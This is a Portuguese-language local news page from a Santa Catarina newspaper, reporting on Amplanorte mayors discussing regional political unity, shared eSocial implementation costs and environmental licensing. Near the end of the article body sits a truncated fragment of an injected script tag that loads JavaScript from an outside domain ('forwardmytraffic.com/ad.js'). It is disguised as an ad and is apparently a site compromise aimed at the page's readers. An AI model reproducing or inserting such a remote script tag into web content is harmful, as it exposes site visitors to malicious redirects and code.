InícioCidadePrefeitos discutem fortalecer unidade política no Planalto Norte

Prefeitos discutem fortalecer unidade política no Planalto Norte

Últimas notícias

Acidente na BR-280 em Três Barras: Veículo capotado é encontrado sem vítimas

Na madrugada desta terça-feira, por volta das 02h18min, o...

Mega-Sena acumula novamente e prêmio vai a R$ 140 milhões

Nenhum apostador aceitou as seis dezenas do concurso 2.793,...

Casal de traficantes vai a júri por tentar atropelar policiais em Três Barras

O casal acusado de tentar atropelar policiais militares durante...

A partir de 2019 licenças ambientais poderão ser outorgados pela Amplanorte.

 

Na primeira reunião após as eleições do primeiro turno, realizada nesta sexta-feira (19), em Canoinhas, um dos principais temas discutidos pelo colegiado dos prefeitos da Amplanorte foi a necessidade de fortalecer a unidade política no Planalto Norte.

 

 

 

Para os prefeitos, a falta de representatividade na Assembleia Legislativa de Santa Catarina, aliada as incertezas em relação a quem vai comandar o país e o Estado, a hora agora, é somar forças.

 

 

 

Para o prefeito de Três Barras, Luiz Shimoguiri, o momento pede mudanças. “Precisamos fortalecer os pontos positivos de cada município. Um exemplo pode vir da Saúde em relação aos hospitais, ao invés de hospitais generalistas, podemos transformar cada unidade referência em uma determinada especialidade. Desta forma o povo ganha com mais qualidade”, pontua.

 

 

 

Outro ponto discutido foi a implantação do eSocial, projeto do Governo Federal que visa unificar o envio dos dados sobre trabalhadores e permitir que as empresas prestem as informações unificadas.

 

 

 

Segundo o prefeito de Canoinhas, Beto Passos, se cada prefeitura trabalhar sozinha, os custos de implantação e consultoria podem chegar a casa dos R$ 150 mil.  “O custo é alto, mas podemos viabilizar a implantação via Amplanorte, assim, os custos seriam rateados proporcionalmente. E se é uma coisa que os prefeitos mais precisam fazer no momento é diminuir custos”, diz.

 

 

Os prefeitos também sinalizaram positivamente numa mudança que já vem ocorrendo em outras regiões do Estado em relação as licenças ambientais. Passando a serem outorgados pelas associações dos municípios. Na região, ficaria a cargo da Amplanorte

 … src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.